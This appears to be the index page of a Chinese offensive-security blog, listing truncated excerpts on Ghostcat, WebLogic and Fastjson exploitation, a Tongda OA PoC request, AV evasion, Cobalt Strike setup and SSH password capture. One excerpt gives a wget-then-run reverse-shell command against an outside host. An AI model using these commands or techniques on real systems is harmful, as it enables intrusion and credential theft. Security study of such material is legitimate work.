Tomcat幽灵猫漏洞实战 🔥
前言: 公司项目上遇到的一个传销站,是一个Thinkphp3.0的。尝试了payload进行注入后,发现只有一个盲注。于是就去找找有没有相同站点,拿个源码来审计审计。搜索到一个相同站点下存在8009端口的ajp协议和一个8080端口的tomcat站点,于是就想到了幽灵猫漏洞。发现使用Jspst
人若无名便可专心练剑
Scroll Down「漏洞复现」通达OA任意用户登陆 🔥
直接上POC热乎着的GET/general/login_code.phpHTTP/1.1Host:192.168.91.131Pragma:no-cacheCache-Control:no-cacheUpgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(
「漏洞复现」CVE-2020-2555-Oracle Coherence&WebLogic反序列化远程代码执行 🔥
「漏洞复现」CVE-2020-2555-OracleCoherence&WebLogic反序列化远程代码执行我的环境靶机:windows2008r2datacenterjavajdk8u202weblogic12.2.1.3.0ip:192.168.91.131攻击机:macOScatali
「漏洞复现」Weblogic CVE-2020-2551 IIOP协议反序列化RCE 🔥
WeblogicCVE-2020-2551IIOP协议反序列化RCE看到weblogic的这个漏洞,想着到时候hw的时候应该可以利用下。。。。环境搭建github上有个大佬,已经把环境脚本全部配置好了。https://github.com/cnsimo/CVE-2020-2551但是在搭建的时候还是
免杀系列——远程获取shellcode
大致思路:https://mp.weixin.qq.com/s/Zs_fCqZfzdzHTwVPvshFyQ他的思路跟我之前的想法差不多,但是我觉得还可以再花里胡哨一点,哈哈哈。我使用Golang(客户端)+Python和flask(服务端)来搭建这套免杀系统。主要原理:服务端关键代码:AES加密s
Fastjson漏洞学习(1)
漏洞复现今天去绿盟那边面试,问了个关于fastjson的问题。没怎么回答上来,主要是都没怎么在实战中用到,不是很熟悉这个。问:Fastjson在遇到不出外网的情况下,如何利用。复现环境Vulhub的docker环境Fastjson1.2.24如何判断使用了Fastjson报错回显一般我是传递一个不完
CobaltStrike的一些配置
主要记录一下C2Profile的配置、上线通知的配置、证书修改的配置,这三个配置在HW行动当中比较常用。1.C2Profile的配置C2Profile我用的github上面找的,可以自行找个修改下。或者按照自己的思路进行伪装,例如伪装成bing搜索的C2profile,但是好像很多APT组织用这个(
FRP代理钉钉通知
主要项目:https://github.com/arugal/frp-notify可以直接下载release版本即可,或者自行使用realse.sh进行编译。目录介绍frp-notify└───system||frp-notify.service#linux系统服务配置文件|│frp-notify#
「Tips」命令执行无回显无法反弹shell的后续操作
我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些
Linux下低权限用户记录SSH的密码
实现思路 当用户执行sshuser@remotehost时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。具体步骤首先使用alias命令创建一个别名这样当用户执行ssh时,执行的是指定的脚本aliasssh="/tmp/